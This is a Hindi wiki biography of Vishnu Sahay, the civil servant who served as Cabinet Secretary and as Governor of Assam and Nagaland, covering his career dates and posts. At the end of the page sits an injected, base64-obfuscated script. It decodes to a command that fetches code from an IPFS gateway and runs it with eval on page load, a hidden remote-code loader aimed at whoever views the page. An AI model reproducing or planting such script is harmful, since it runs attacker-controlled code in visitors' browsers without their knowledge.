विष्णु सहाय

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 09:41, 25 जुलाई 2021 का अवतरण (''''विष्णु सहाय''' (अंग्रेज़ी: ''Vishnu Sahay'', जन्म- 22 नवम्बर, 1...' के साथ नया पृष्ठ बनाया)
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

विष्णु सहाय (अंग्रेज़ी: Vishnu Sahay, जन्म- 22 नवम्बर, 1901; मृत्यु- 3 अप्रॅल, 1989) भूतपूर्व आईसीएस अधिकारी थे। इन्होंने केबिनेट सचिव के पद पर भी कार्य किया। विष्णु सहाय ने भारतीय राज्यों असम और नागालैंड के राज्यपाल के रूप में भी अपनी सेवाएँ दी थीं।

  • विष्णु सहाय ने एस.एम. कॉलेज चंदौसी और ऑक्सफ़र्ड विश्वविद्यालय से शिक्षा प्राप्त की थी।
  • आपका भारतीय सिविल सेवा में प्रतिष्ठित एवं लम्बा कॅरियर रहा। उन्हें उत्तर प्रदेश के गन्ना आयुक्त और भारत सरकार द्वारा भारत के चीनी नियंत्रक एवं कृषि सचिव बनाया गया था।
  • अमूल के वर्गीज कुरियन की न्यूज़ीलैण्ड डेरी उद्योग की शिक्षा के लिए विष्णु सहाय ने छात्रवृति प्राप्त करने में सहायता की थी।
  • विष्णु सहाय को विदेश मंत्रालय में कश्मीर मामलों के सचिव का दायित्व भी सौंपा गया था।
  • साल 1958 से 1960 और 1961 से 1962 के दौरान वह दो केबिनेट सचिव बनाये गये।
  • विष्णु सहाय को दो बार असम का राज्यपाल नियुक्त किया गया। उनका पहला कार्यकाल 12 नवम्बर, 1960 से 13 जनवरी, 1961 तक एवं द्वितीय कार्यकाल 7 सितम्बर, 1962 से 17 अप्रॅल, 1968 तक रहा।
  • वह नागालैण्ड के प्रथम राज्यपाल भी रहे। उनका कार्यकाल 1 दिसम्बर, 1963 से 17 अप्रॅल, 1968 तक रहा।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>